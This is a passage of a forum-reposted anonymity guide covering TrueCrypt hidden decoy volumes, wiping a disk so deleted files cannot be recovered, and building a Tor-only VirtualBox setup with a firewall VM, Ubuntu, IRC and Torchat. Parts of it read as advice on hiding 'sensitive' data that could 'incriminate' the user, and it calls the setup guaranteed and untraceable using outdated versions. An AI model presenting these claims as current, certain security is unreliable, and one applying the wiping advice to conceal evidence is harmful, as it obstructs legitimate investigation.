Once you have copied files/folders into the hidden volume, do *NOT* touch the files or folders in the outer volume anymore. Remember that both volumes occupy the same single file, and therefore changing the outer volume can damage the hidden volume. Once you have copied files/folders into the outer volume during the installation process, that is the last time you should do so. From that point forward, use ONLY the hidden volume. The outer volume exists only as a decoy if you need it.

Next:6. Securing your Disk ===

















=== 6. Securing your Disk ===

This is an involved step which many people may not be able to do right away. If you cannot do this step immediately, then see section 7.

At this point you should understand how to create and use TrueCrypt hidden volumes in order to safeguard any sensitive information. Therefore, you should *NOT* keep any such sensitive information on your hard disk.

At this stage, there are two possibilities:

1. You have never had any sensitive information on your hard disk. In this case, read this section but you can certainly skip it.
2. Up until now, you have stored sensitive information on your hard disk. If so, then you MUST read this section.

If you have ever used this computer to access sensitive information, then all of the security and precautions in the world are totally useless and futile because all someone has to do is access what is left of that sensitive information. I cannot stress this enough.

You can have the most secure TrueCrypt volumes, use TOR, and be the safest most secure user in the world. If you have not made sure that *ALL* remnants of any sensitive information are UTTERLY REMOVED from your hard disk, then all of that effort is totally pointless. You MUST take these actions to safeguard your hard disk, or otherwise you might as well throw away this guide and follow none of the advice herein.

First, I understand that it is troublesome to have to re-format a computer, to back everything up, and reinstall everything. However, if you have ever had sensitive information on your machine, that is what you have to do. Take the following steps:

1. Obtain a removable harddrive or usb flash drive large enough to store anything you need to save.
2. Set up a truecrypt hidden volume on that harddrive big enough to hold all of that information.
3. Set up the truecrypt outer volume as in the previous section. Use the previous section as a guide if you need to.
4. Be sure you the hidden volume will have enough space to store all that you are backing up.
5. Copy ALL data you need to back up/save into that hidden volume.

*** IMPORTANT, READ THIS ***

If you have ever used this system to access sensitive information, then you must assume that the sensitive information or remnants of it can be *anywhere* on your hard disk. Therefore, you need to move *EVERYTHING* you intend to save into the hidden truecrypt container. You do not know where sensitive data might be, so you are assuming it can be anywhere. This way you still have ALL of your data and you have lost nothing.

A good analogy is toxic waste. You don't know which barrel might contain the toxic waste, so you treat *ALL* the barrels as potentially toxic. This is the
surest way you can protect yourself.

You might be saying, "I have family photos, music, movies that I would have to move to the hidden volume." That is perfectly fine. Remember that you can access that hidden volume just as if it was a drive letter. In fact, ideally, *ALL* of the content on your computer (assuming you value your privacy) should be protected anyways. You lose nothing by securing all of that data.

6. Once you have copied everything you intend to copy. dismount your hidden volume, reboot your computer, and re-mount your hidden volume to make sure everything is there.
7. Now it is time to re-format your entire hard drive. Re-install your operating system of choice (such as Windows 7), and start with a clean slate.
8. Once you have reinstalled your operating system from scratch, follow sections one through five of this guide to reach this point, and then proceed.

Next:7. Temporarily Securing Your Disk, Shredding Free Space ===
























=== 7. Temporarily Securing Your Disk, Shredding Free Space ===

Like the previous section, this section applies ONLY IF there is some risk that sensitive data has ever been stored or accessed on this computer. If you are 100% sure that sensitive information has never been accessed using this computer, then you can safely skip this and the previous step.

If you are not prepared to take the actions in the previous step yet, then you should follow the steps in this section until you can. However, you MUST eventually take the actions in step six above. Do not assume you can find/delete all sensitive content. Lists of filenames, image thumbnails, random
data, and more *ARE* sitting on your hard disk. Someone who knows how to find it, WILL. That will render all of your other precautions totally futile.

As soon as you can, follow the instructions in step six.

Meanwhile, here is how you can temporarily safeguard yourself until you are able to follow those instructions.

1. Go through your hard disk folder by folder, deleting (or moving to a truecrypt hidden volume) any files that you believe are sensitive/risky.

2. When you are totally sure that you have deleted all such files, go to the following URL: http://www.fileshredder.org

3. Scroll down and look for the button called "Download File Shredder" -- do NOT click any other button, as the page may have ads on it that appear to be download links.

4. Save the file.

5. Run the file, most likely titled: file_shredder_setup.exe

6. "Welcome to the File Shredder Setup Wizard", Click "Next"

7. Select "I accept the agreement" and click "Next"

8. It will choose where to install it, click "Next"

9. Click "Next" again when prompted for the Start Menu folder.

10. "Select Additional Tasks", Click "Next" again

11. Click "Install"

12. Ensuring that "Launch File Shredder" is checked, click "Finish"

13. You should now notice that "File Shredder" is running. You should see the program in your task bar. Click on it to bring up the control panel if it is not up already.

14. On the left is a link that says "Shred Free Disk Space", click it.

15. Choose the drive letter for your hard disk, typically C:, as well as any other drives you wish to shred the free space.

16. under "Select Secure Algorithm", select "Secure Erasing Algorithm with 7 passes" and click "Next"

17. Click "Start"

This will take some time to finish. Once you have finished shredding your free disk space, it will be impossible or nearly impossible for someone to find one of your deleted files and piece it back together to see what it once was. However, this is NOT enough.

Keep in mind that there may still be records of the filenames that were deleted, partial data from those files, image thumbnails, and more that may be enough to incriminate you. This is only a temporary step you have taken, and you absolutely must take the actions in step 6 above in order to be truly safe.

Next:8. Installing VirtualBox



















=== 8. Installing VirtualBox

And now we get to the fun part. We are going to create a secure environment for you to browse the internet and communicate in a way that is totally anonymous and untraceable. You will have a setup that is so secure as to be virtually impossible to break.

1. First, go to the following URL: http://www.virtualbox.org

2. Select "Downloads" in the menu on the left.

3. Under "VirtualBox platform packages" is "VirtualBox 4.0.4 for Windows Hosts", next to that is "x86/amd64". Click that.

4. Save the file. It should be titled similar to: "VirtualBox-4.0.4-7011-Win.exe

5. Run the file.

6. "Welcome to the Oracle VM... Setup Wizard", Click "Next"

7. click "Next"

8. Click "Next"

9. "Warning: Network Interfaces", click "Yes" but be aware that your internet connection will be temporarily reset for a few seconds.

10. Click "Install"

11. A dialog saying "A program needs your permission to continue" may appear, click "Continue".

12. One or more dialogs asking if you want to install "device software" may come up, select "Install" each time.

13. Optionally check the box "Always trust software from Oracle Corporation."

14. "Oracle VM... installation is complete", Click "Finish" ensuring that "Start Oracle VM after installation" is checked.

Now we have the software we need in order to set up and run virtual machines. On your task bar to the far right, you should notice VirtualBox running. Click on the "VirtualBox" icon if needed in order to bring the VirtualBox control panel into view.

Now it is time to set up a virtual machine. For this, we need to obtain two files. Operating systems, such as windows, are typically installed using a cd or dvd. You put the cd or dvd into your computer, you boot it up, and you follow the instructions in order to install the operating system. Virtual machines
work similarly. Before we can use a virtual machine, we have to install an operating system on it.

However, we are *NOT* going to use Windows! We are going to use Linux. Do not be afraid if you have no experience using Linux. I assure you that this will prove to be painless. We actually need two different linux operating systems in order to have a secure system. Before we go through the steps of setting this up, I want to describe to you what we are doing.

Remember earlier in the guide I explained that one of the downsides to using Tor Browser from your main computer is that you might accidentally put a link into a non-Tor browser. The problem with your computer right now is that you can access tor sites, or non-tor sites equally well. That means that you have to be extremely careful to ensure that you are using Tor.

An analogy would be to say that you are typing on a keyboard with red and green keys. You have to be careful to only hit the green keys. If you accidentally hit a red key, then you could compromise your security and anonymity. That is *not* a good position to be in. The purpose of setting up a virtual machine is to make certain that you cannot accidentally reveal your identity or compromise your security.

The computer you are using now has two ways of accessing the internet: TOR, and Non-TOR. The virtualmachine we are setting up however will only be able to access the internet using TOR. No other way period. That means that no matter what you do, no matter how hard you try, you will NOT be able to accidentally access any website except through TOR. This *guarantees* that whatever you do on that virtual machine is going to be through TOR.

So how do we achieve this? There are a number of ways to do so. The method presented in this guide is not the only good way, however I do believe that it is both easy to set up and also friendly to users who may not have a great deal of RAM.

First, we are going to set up two different virtual machines. One of them will exist for the sole purpose of making sure that the other one does not accidentally connect to the internet except through TOR. This virtual machine requires very little. You will not be using it for anything. It will simply act as a gatekeeper to ensure that the other Virtual Machine is safe.

The second virtual machine will be what you use for internet browsing, chatting, etc. This virtual machine will be configured in such a way that it can only use TOR and nothing else. The way we will achieve this is to force this second virtual machine to go through the first virtual machine for all internet connections.

Do not worry if this seems complicated. As with the rest of this guide, I am going to walk you through step by step exactly what to do.

First, we have to obtain the operating systems we will need. In this case, we are going to use "Damn Small Linux" (yes that is it's real name) for the firewall and we are going to use "Ubuntu" for the main system. The advantage to using "Damn Small Linux" is that we only need 32 MB of ram and no disk sapce to have an effective firewall.

Let's set up the firewall first:

Next:9. Installing a Firewall ===






=== 9. Installing a Firewall ===

1. First, go to the following URL: http://www.damnsmalllinux.org (three l's)
2. Scroll down until you see a link that says "Download"
3. Under "Current Full Mirror List", click any that work. Some may not work at any given time. If one doesn't work, simply hit back on your browser and try another one.
4. At the time of this guide, the following url worked: ftp://ftp.is.co.za/linux/distributions/damnsmall/current/
5. Go to the "current" directory if not already in it.
6. Click on the file called: dsl-4.4.10.iso -- If you cannot find this file, choose the file closet to it. A higher version number is fine. The file will probably be about 50 MB
7. The file should take about 5-10 minutes to download based on your connection.

(IF THE ABOVE STEPS WORKED FOR YOU, SKIP THIS MINI-SECTION)

(If you had trouble with the above steps, read this mini-section)
(With mirrors, it is often the case that a particular mirror site doesn't work. At the time of this writing, several mirrors worked. I am providing detailed instructions for each mirror.)
(Above I have already provided instructions for the mirror)
ftp://ftp.is.co.za

MIRROR: http://gd.tuwien.ac.at/opsys/linux/damnsmall
(Go to this URL, and under "Subdirectories" click on "current") if available, select the file called "current.iso" (provided the file is at least 49 MB in size) If not, then choose the closest file to dsl-4.4.10.iso, a higher version # is fine.

MIRROR: http://ftp.belnet.be/packages/damnsmalllinux/
(go to "current" directory, obtain either "current.iso" (if 49 MB or higher) or find file closest to "dsl-4.4.10.iso")

MIRROR: http://ftp.heanet.ie/mirrors/damnsmalllinux.org/
(go to "current" directory, obtain either "current.iso" (if 49 MB or higher) or find file closest to "dsl-4.4.10.iso")

At this point, you should have the file either "current.iso" or "dsl-4.4.10.iso" (or something similar) fully downloaded and saved into your Downloads directory.

Now, go ahead and open up VirtualBox again, most likely by clicking it on the task bar.

8. Click "New" at the top left, an icon that resembles a many-pointed round star.
9. "Welcome to the New Virtual Machine Wizard", click "Next"
10. "VM Name and OS Type": Under "Name" type in: Firewall
11. For Operating System, choose "Linux"
12. For "Version", choose: "Other Linux"
13. Click "Next"
14. "Memory", select "32 MB" and click Next
15. "Virtual Hard Disk", Uncheck "Boot Hard Disk" and click "Next"
16. If a Warning dialog appears, click "Continue"
17. Click "Finish"
18. Now you will notice "Firewall, Powered Off" visible in your VirtualBox control panel. Make sure it is highlighted (it should be) and then right click it, and select "Settings".
19. Select "Network" in the menu to the left.
20. Click on the "Adapter 2" tab.
21. Check "Enable Network Adapter" and next to where it says "Attached to", select "Internal Network" from the pulldown menu.
22. Click "Ok" at the bottom.
23. Once again, right click "Firewall, Powered Off" and select "Start"
24. Check "Do not show this message again" and click "Ok". This is just letting you know that the "RIGHT CTRL KEY" on your keyboard is the "control" key for this virtual machine.
25. "Welcome to the First Run Wizard", click "Next"
26. "Select Installation Media", under "Media Source" is a pull down menu. To the immediate right of that pull down menu is an icon with a folder. Click that folder icon.
27. Locate "current.iso" or "dsl-4.4.10.iso" (or the similar file name) that you downloaded. When located, click "Open". It is likely in the "Downloads" directory of your home folder.
28. Click "Next"
29. Click "Finish"

Now the virtual machine will start to boot up. Simply wait... (This may take up to 5 minutes.)

30. One or more new dialogs may come up saying "VirtualBox Information", just click "Do not show this message again" and click "Ok"

After a few minutes, the booting will finish and you will be looking at the desktop for your firewall virtual machine. To the right of the window you will see some stats that look something like this:

Up: 0 k/s - Down: 0 k/s
Processes: 19
CPU Usage: 10%
RAM Usage: 16.2MB/28.8MB

etc.

Congratulations! You now have a firewall running. Now we will set up this firewall to protect you so that you can safely use TOR from your main virtual machine.

Next:10. Firewall Configuration ===
=== 10. Firewall Configuration ===

At this stage you should be looking at the desktop for "DSL" (Damn Small Linux).

I need to talk about the mouse first. This particular virtual machine as well as your main operating system (windows) both want control of your mouse. Both cannot have control of your mouse at the same time however. Therefore, you have to choose whether the mouse will be used by your virtual machine, or by Windows. When you click into your virtual machine, it has the effect of passing control of the mouse to the virtual machine. That means you cannot move your mouse cursor past the boundaries of that virtual machine. In order to give mouse control back to windows, enabling you to move your mouse cursor anywhere, simply press the right ctrl key on your keyboard. That is to say, you have two ctrl keys. One on the left of your keyboard, and one on the right. Press the ctrl key that is on the right of your keyboard. This will give mouse control back to windows.

Practice this a bit. Practice clicking into the window, moving the mouse cursor around, pressing right ctrl, and moving the windows mouse cursor around. Get the feel of it.

You should see a window that looks something like a web browser, with some text in it including words such as "Getting Started with DSL". First, close that window.

(If your mouse is not working, read this mini-section.)

(First, click inside the window that your virtual machine is running in). Now try moving your mouse cursor. If you do not see the mouse cursor moving around, then press (RIGHT CTRL + I). Now move your mouse cursor again. If you notice that you are moving your "main" mouse cursor over the window, but you do not see the "DSL" black mouse cursor moving, then click again into that window. If you do this a few times, you should notice that the mouse begins to work. You may have to press RIGHT CTRL+I a couple of times to get the mouse to work.

1. Once the mouse is working inside of your virtual machine, go ahead and close the window entitled "Getting Started with DSL"

(If you cannot see the full virtual machine window, for example because your screen resolution is set so that some of the window goes too low, read this mini-section).

(First, press RIGHT CTRL+I until you have your main windows white mouse cursor back). Now, click on "Machine" in the menu at the top of the window.
(Select "Switch to Scale Mode")

( Click "Switch")

(Now you will have converted your firewall window to a smaller size, and you will be able to resize it. You may need to press "right ctrl" to get a windows mouse cursor (which you will need in order to resize this window). Now simply resize it to the size that works for you, and then click into the window to be able to use the black mouse cursor inside the virtual machine. I recommend you maximize this window to make sure you can read everything clearly.

2. Right click anywhere on the desktop, go to System (a red folder), go to Daemons, ssh, and start.

3. Right click again anywhere on the desktop, go to XShells -> Root Access -> Transparent

4. Now you have a window that you can type in. Type exactly as shown below into this window, and hit enter:

passwd

Once you type this and hit enter, it will ask you for a password. This is a password for full access to the firewall. Make it at least 8 characters in size.

*** IMPORTANT: Do not forget your firewall password. You will need it later in the guide. ***

When you have successfully changed your password, it will say "Password changed."

5. Now type exactly as shown below, into the same window:

ifconfig eth1 10.0.3.1

6. It will not say anything after you hit enter, it will just return you back to the prompt.

Now our firewall server is ready. We want to save this state so that we can get back to it easy in the future.
Press RIGHT CTRL+S

7. Now you will be looking at a window that says "Take Snapshot of Virtual Machine". Just click "Ok"

8. Now, let's test this out to confirm it works as we expect. Go ahead and close the virtual machine by clicking the "X" in the top right corner. A menu will come up. Select "Power off the machine" and click ok. Do NOT check the box called "Restore current snapshot".

And now you should be once again at the VirtualBox manager. You will see "Firewall (Shapshot 1), Powered Off"

9. Make sure that "Firewall (Snapshot 1), Powered Off" is selected. At the top right of your VirtualBox Manager is a button that says: "Snapshots (1)". Click it.

10. Click on "Snapshot 1", the top-most selection. This will highlight it.

11. Now right click it, and click on "Restore Snapshot"

12. A dialog box will come up asking if you are sure, click "Restore"

13. Now click the "Start" button at the top with the large green arrow.

14. Any dialog boxes that come up with a check box saying "Do not show this information again", simply check the check-box, and click ok. Do not worry about any of those.

Remember, if you do not have immediate control of the mouse inside the virtual machine, simply press RCTRL+I (press right ctrl and "I" at the same time) and click into it until you have mouse control.

Now your firewall is good to go. Any time you need it, just go to the VirtualBox Manager and follow steps 9 through 14 above. You do not have to go through the whole setup process again at any time in the future. Your firewall is ready.

Next:11. Installing Ubuntu ===











=== 11. Installing Ubuntu ===

Now we are going to set up the main machine that you will be using TOR with.

1. First, go to this URL: http://www.ubuntu.com

2. Click on the link "Download Ubuntu"

3. Click "Start Download" (This download should take 10-15 minutes)

4. The filename is going to be similar to: ubuntu-10.10-desktop-i386.iso

Now we wait...

While you are waiting for the file to download, go ahead and make sure that your "hidden volume" is mounted in TrueCrypt to a particular drive letter. For example, O: You will need that for the next step.

5. Return to your "VirtualBox Manager". It doesn't matter if the firewall is running or not.

6. Click "New" (the blue round star-icon in the top left) again.

7. "Welcome to the New VirtualMachine Wizard", click "Next"

8. "VM Name and OS Type", under "Name", type "Primary"

9. Next to "Operating System", select "Linux"

10. Next to "Version", select "Ubuntu" and Click "Next"

11. "Memory", by default it selects 512 MB. This is fine. 256 MB is the MINIMUM. The more memory you allocate, the better the virtual machine will function. Click "Next"

12. "Virtual Hard Disk", Make sure "Boot Hard Disk" is checked. Make sure "Create new hard disk" is selected. Click "Next"

13. "Welcome to the Create New Virtual Disk Wizard", click "Next"

14. "Hard Disk Storage Type", select "Fixed-size storage" and click "Next"

15. "Virtual Disk Location and Size", to the right of the text box containing "Primary" is a folder icon. Click the folder icon.

16. Now we have to select a file for the new hard disk image file. On the bottom of this dialog it says "Browse Folders", click on that.

17. Now click on "Computer" in the menu to the left.

18. Scroll to where you see the drive letter you mounted, and double click on it. Ex: Local Disk (O:)

19. Now click "Save"

20. By default 8.00 GB are selected. That is fine. If you have enough space on your hidden volume, increase this to 10 GB. Otherwise, 8 is fine.

21. Under "Location", it should say O:Primary.vdi where O: is replaced by whatever drive letter you mounted your TrueCrypt hidden volume to.

22. Click "Next", then click "Finish"

Now we wait for VirtualBox to create the hard drive we asked for. This may take a few minutes.

Keep in mind this entire virtual machine as well as any of its contents are going to reside within the hidden truecrypt container. This ensures extra security.

23. When this is done, you will see a "Summary" window. Click "Finish".

24. Now, right click on "Primary, Powered Off" in your "VirtualBox Manager", and click "Start"

25. Again we are at the "First Run Wizard", click "Next"

26. "Select Installation Media", under "Media Source" is a pull down menu. Click the "folder icon" to the immediate right of that pulldown menu.

27. Locate "ubuntu-10.10-desktop-i386" (or the similarly named file) from your Downloads directory, or wherever you saved it. Click on it, and click "Open"

28. Click "Next"

29. Click "Finish"

Now simply wait. Your Ubuntu virtual machine will be loading up. This may take a few minutes. Don't worry if you see all kinds of strange messages/text. It is normal.

After a few minutes, you should start to see the Ubuntu desktop load. Unlike your firewall, you will notice that you do not have to click the mouse inside the window. It automatically happens. This is going to be much easier than the "Firewall" step.

Once everything has loaded, you will be looking at a window that says "Install" with a button that says "Install Ubuntu". If you cannot see everything, press RCTRL+F (to go full screen). You can return to windowed mode by RCTRL+F again. Any dialogs can be closed, and you can check the box that says "Do not show me this again."

30. Click "Install Ubuntu"

31. Check "Download updates while installing"

32. Check "Install this third-party software". Click "Forward"

33. Ensure "Erase and use entire disk" is selected, and click "Forward". Remember, this is NOT talking about your hard disk. It is talking about the 8-10 gigabyte virtual disk.

34. Click "Install Now"

35. Now you will be guided through a series of installation related screens. The first screen asks you to select your timezone/time. Select your choice and click "Forward"

36. Now keyboard layout, again select your choice and click Forward. If you are unsure, leave it as is or click "Figure out keyboard layout"

37. "Who are you?" For "Your name" type in: mainuser

38. When you type in "mainuser" the other boxes will fill in automatically. Now click in the text box next to "Choose a password".

39. Do NOT use the same password as the firewall. Come up with a different password.

40. Ensure that "Require my password to log in" as well as "Encrypt my home folder" are selected and checked and proceed.

Now simply wait until the installation is finished. The installation may take a while, and it may appear to stall at some points. As long as the ubuntu mouse cursor shows an animation that is turning around in circles, the installation *is* working. Simply wait until it is done. If after an hour or two the progress bar hasn't moved at all, then go ahead and re-start the installation starting from step 24 (after closing the window and powering down the virtual machine).

Depending on your computer, it could take 2-4 hours. Most likely, it will take about an hour. Once finished, you will see a dialog that says "Installation Complete" with a button that says "Reboot Now". Do NOT press the "Reboot Now" button. Close the 'X' on this window, and Power Down.

41. Now, right click "Primary" and go to "Settings".

42. Click on "Storage" in the left menu. Then click on the "ubuntu-10.10... .iso" under where it says "IDE Controller"

43. To the right it says "Attributes" under that it says "CD/DVD Drive : ..." to the immediate right of that is a cd icon. Click it.

44. Select "Remove disk from virtual drive."

45. Click "Ok"

46. Now, making sure that "Primary" is highlighted, click the "Start" button at the top with the large green arrow.

Now we wait for your newly installed Ubuntu machine to boot up.

47. After a few minutes, you will see a dialog appear that says "mainuser-VirtualBox". Go ahead and click on "mainuser" which has the "person icon" to the left of it.

48. Now it will prompt you for your password. Enter the password you used in the installation process.

49. After a minute or so, you should hear a nice login sound, and you should be fully logged into your virtualmachine.

50. Keep waiting, and a dialog will appear that says "Information avialable" and "Record your encryption passphrase" Click on: "Run this action now"

51. Type in the same password you used to log in. After that window closes, click "Close" in the dialog box.

Congratulations! You have now set up a virtual machine as well as a firewall to protect it. Now we need to finish configuring the primary virtual machine.

Next:12. Ubuntu Initial Setup ===
=== 12. Ubuntu Initial Setup ===

Ok, now that we have installed Ubuntu, we need to set it up so that we can use it fully. This also means making sure we can see flash on websites such as youtube.

1. First, we have to install any updates that are pending. At the bottom of your screen, you should notice where it says "Update Manager". Click on that.

2. Now, click on "Install Updates". If you did not see "Update Manager", then skip these two steps.

3. Any time an administrative task is required, you will need to type in your password. This is the same password you used to log in.

Now we wait, this is going to download any necessary security updates to make certain we are using the most current/secure setup possible. This may require downloading hundreds of megabytes. Just go ahead and let it do that, and when everything is downloaded and updated, proceed to the next step. While you wait, Ubuntu may go into screensaver mode. If so, just move the mouse and it will ask you for your password. That will leave screensaver mode.

If the updates are more than a hundred megabytes, it will take quite a while. It may take up to 2-3 hours depending on your computer and internet connection. Nonetheless, this step is critical. Do not skip the updates. Besides ensuring that your setup will be secure, the updates also ensure that all of the applications are up to date and thus most likely to function correctly. Just go ahead and watch a movie for a couple hours, and then return and check on it.

After all of the updates have been downloaded and installed, the "Update Manager" window will now say "Your system is up-to-date" at the top. Further, it will say: "The computer needs to restart to finish installing updates.". Go ahead and press the 'X' in the top right corner of the window, and choose 'Send the shutdown signal". If prompted, click "Shut Down". Once it has fully shut down, the window will disappear and you will be back at the VirtualBox manager. Go ahead and right click on "Primary" and click "Start". This will restart the virtual machine.

If a virtual machine fails to shutdown after 10 minutes or so, then go ahead and close the window again by pressing the 'X' but this time choose "Power down". If it still will not shut down, then VirtualBox may have crashed. If so, just follow these instructions:

( Follow the steps in this mini-section if a virtual machine fails to shutdown, or you need to completely close/restart VirtualBox).

( First, press "Ctrl+Alt+Delete", and then click "Task Manager"). Next, locate the process that is running that starts with "VirtualBox". Right click that process, and click "End Process Tree"
(This should force the window to close).

(Now, restart VirtualBox by going to your start menu, All Programs, Oracle VM VirtualBox VirtualBOx).

Now you will have the VirtualBox manager up again. To restart the Ubuntu machine, simply right click on "Primary" and click "Start".

Once your Primary vm has rebooted, you will be again at the login screen. Here as before, click on "mainuser" and then enter in your password. Now your primary machine is fully up to date. Remember, be patient. It may take a few minutes before your virtual machine has fully booted. First you will see the background image and a mouse cursor that can move around, next you should hear the login sound play, and finally you will see the menu at the top and bottom of your virtual machine window. Depending on the speed of your computer, this may take 10 minutes or more. Just be patient. Don't worry if your virtual machine appears to be running too slow, we will speed it up.

Now your Virtual Machine is set up and ready for use.

Next:13. Installing Guest Additions ===




















__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #6 
(CONTINuED DOCUMENT)
=== 13. Installing Guest Additions ===

In order to ensure that the Virtual Machine runs smoothly as possible, we are going to install some additional software to the virtual machine.

1. Go to the "Devices" menu at the top of your virtual machine main window (Machine, Devices, Help), and go to "Install Guest Additions"

2. Go to the "Places" menu at the top of your virtual machine (Applications, Places, System), and click on "VBOXADDITIONS_4.0.4_70112" (the number may be different).

3. At the top this new window will be the text "The media has been determined as "UNIX software". Click on "Open Autorun Prompt"

4. A new dialog may appear saying "This medium contains software intended to be automatically started. Would you like to run it?" Click "Run"

5. Enter your administrative password (the one you use to log into Ubuntu) and click "Ok"

6. Now the VirtualBox Guest Additions installer will begin. This may take some time, so just relax and wait. Depending on your computer, this may take 30 minutes or more.

7. When this is finished, you will see the text "Press Return to close this window." Go ahead and do so.

8. Once that window has closed, go ahead and press the 'X' to close the entire virtual machine window. Select "Send the shutdown signal" and click "Ok".

9. A dialog box will appear. Click on "Shut Down", the top most option.

At this stage it is a good idea to further optimise our virtual machine. When you initially installed it, you most likely selected either 256 MB or 512 MB of RAM. If you have enough RAM to spare, then I highly recommend you increase that to at least 1 GB. Here is how to do so:

1. First, right click on "Primary, Powered off" and go to Settings.

2. Select "System" from the menu on the left.

3. Increase the "Base Memory" to either 1024 MB (1 GB), or some higher value you are comfortable with.

It is also a good idea to increase the video memory available to the virtual machine.

4. Select "Display" from the menu on the left, still inside of "Settings"

5. Increase the "Video Memory" slider to the right as far as you are comfortable with. For example, 128 MB.

6. Check the box "Enable 3D Acceleration".

7. Now click "Ok" at the bottom.

Go ahead and start up Ubuntu again by right clicking "Primary, Powered off" and clicking "Start"

When Ubuntu loads up, go ahead and log in as before using your password. Now wait until Ubuntu is fully booted and the "Applications Places System" menu is visible.

You will probably notice that your virtual machine loads up and runs faster than before.

How well your virtual machine runs depends on how good your computer is. Primarily, RAM and processor speed are the most significant factors. If your computer is modern enough, you should be able to use websites with flash and even watch videos, such as on YouTube, with no problem. If your computer is not as modern, you will still be able to browse websites but may not be able to watch videos. You should still be able to use most flash based websites however.

*** IMPORTANT: Do NOT browse sensitive content YET. At this stage, your virtual machine is not yet configured to use TOR. ***

Next:14. Installing IRC (Optional) ===



















=== 14. Installing IRC (Optional) ===

*** This section is entirely optional. If you are not interested in installing IRC, skip this section. ***

To install IRC on your new virtual machine, follow these steps:

1. Go to the "Applications" menu, and go to "Ubuntu Software Center"

2. Type "kvirc" in the search box field in the top right.

3. When the results return, select the one called: "KDE-based next generation IRC client" or "KV Irc".

4. Click "Install"

5. Enter your password when prompted.

6. While it installs, you will notice a progress bar. This may take a few minutes depending on the speed of your internet connection.

7. Once it is finished installing, the progress bar will go away. Go ahead and close the "Ubuntu Software Center".

You are probably used to the close/ min/ max buttons being on the top right, as is the case in Windows. You will find them in the top left instead. If you don't like this, don't worry. You can change it later.

Now, let's go ahead and set up KVIrc.

Remember, you are NOT truly anonymous yet.

8. Click on "Applications" in the top menu.

9. Go to "Internet"

10. Click on "KVIrc"

11. "KVIrc Setup" will appear. Go ahead and click "Next" to begin.

12. "Store Configuration in Folder", click "Next"

13. "Please choose a Nickname". You can leave this exactly as is, or you can choose a Nick name then click "Next".

*** IMPORTANT READ THIS ***

Do NOT pick a nick name you have ever used before, or a nick name that can help someone determine who you are. Also, do NOT fill in any other details such as location, age, real name, etc. Leave everything else as is.

You are NOT Anonymous yet.

14. Now you are asked to pick a theme, select "No theme" then click "Next"

15. Now click "Finish" to leave the KVIrc Setup

16. A new window will appear having a list of servers, click "Close"

Now let's connect to the "Freenode" IRC network. By now, you may have many questions about how to use Ubuntu. The #Ubuntu chatroom on Freenode is a great place to start, and where you can ask questions related to how to use Ubuntu and VirtualBox. Please remember, you are NOT anonymous yet and anything you say can be matched to your IP address. Keep the conversation related to technical help, or just learning Ubuntu.

Do NOT discuss TOR.
Do NOT discuss ANY sensitive material.

Remember, this chatroom consists mostly of people who have set up Ubuntu for other reasons. Therefore, they will be able to help you configure it, and answer many questions about how Ubuntu works.

17. At the bottom right of KVIrc is a long text input box. Click inside that box.

18. Type, exactly as shown below, including the "/" character:

/server irc.freenode.net 6667

19. This will connect you to the Freenode IRC network. After a few minutes, you will be connected and a dialog box will appear.

20. Uncheck the box that says "Show this window after connecting", and then click "Close"

21. Now, in the same text box as you typed the /server command, type the following exactly as shown below, including the "/" and "#" characters:

/join #Ubuntu

22. Now you are in the #Ubuntu chatroom. Feel free to discuss the Ubuntu operating system and ask questions related to how to use Ubuntu. Remember:

*** Do NOT discuss TOR or sensitive material. You are NOT anonymous. ***

This is a good opportunity for you to learn how to set up Ubuntu to be the way you want as far as colors, layout, theme and so forth. When you have finished, simply close the "KVIrc" window.

Next:15. Installing Torchat (optional) ===




=== 15. Installing Torchat (optional) ===

*** This section is entirely optional. If you are not interested in installing Torchat, skip this section. ***

Torchat is a program you can use to communicate securely and anonymously with other Torchat users. It is only useful if you already know someone who is using it. If you do not know someone using Torchat, then it is best to skip this section and come back to it in the future when you want to install Torchat.

These instructions work for Ubuntu 10.10.

First, installing Torchat is a bit tricky because Ubuntu does not include Tor by default in its repositories. Tor is a requirement for torchat, and therefore we have to first install Tor on Ubuntu. Doing so is not too difficult.

1. First, go to "Applications" -> "Accessories" -> "Terminal". You will see a new window appear with a prompt that looks like this:

mainuser@mainuser-VirtualBox:~$

2. Now, type exactly as shown below, and hit enter:

sudo bash

3. After entering your password, you will be at a new prompt which looks like this:

root@mainuser-VirtualBox:~#

4. Now, either type or copy-paste the below text into this window and then hit enter:

echo "deb http://deb.torproject.org/torproject.org experimental-lucid main" | sudo tee -a /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 886DDD89

5. After you do this, you should see the following at the bottom of your window:

gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)

6. Now, we should be able to install tor. In this same window, type the following commands, one at a time:

apt-get update
apt-get install vidalia privoxy tor

7. (press Y and enter when prompted)

Now we need to obtain the Torchat installation file, follow these steps:

8. In firefox on Ubuntu, go to the following URL: http://code.google.com/p/torchat

9. On the left under where it says "Downloads"

10. One of the files listed will end in .deb, for example torchat-0.9.9.deb. Click on that file name.

11. On the next page, again click on the file name. This should begin the file download.

12. By default, Ubuntu wants to open this file using the "Ubuntu Software Center". This is correct.

Now wait until the file finishes downloading, and then the "Ubuntu Software Center" will appear. Follow these steps:

1. Press "Install"

2. Type in your password when prompted.

After a short wait, Torchat will be installed.

To start Torchat, go to "Applications" -> "Internet" -> "Torchat Instant Messenger"


Next:16. Creating TOR-Only Internet Environment ===

=== 16. Creating TOR-Only Internet Environment ===

Up until now, we have been using our Virtual Machine to access the internet directly. This was necessary so that we could install updates, software, and
get a feel for how to use Ubuntu.

Now it is time to force Ubuntu to connect to the internet using TOR Only. At the end of this phase, your Ubuntu virtual machine will be usable as a secure and anonymous TOR based browsing environment. It will be *impossible* for you to access the internet except through TOR, and therefore you can rest assured that anything at all you do online through the Ubuntu virtual machine will be through TOR.

First, we need to shut down any running virtual machines. If "Primary" is running, click the 'X' in the top right to close it. Select "Send shutdown signal"
and then select "Shut Down" when prompted. If "Firewall" is running, go ahead and close it in the same way, but choose "Power off".

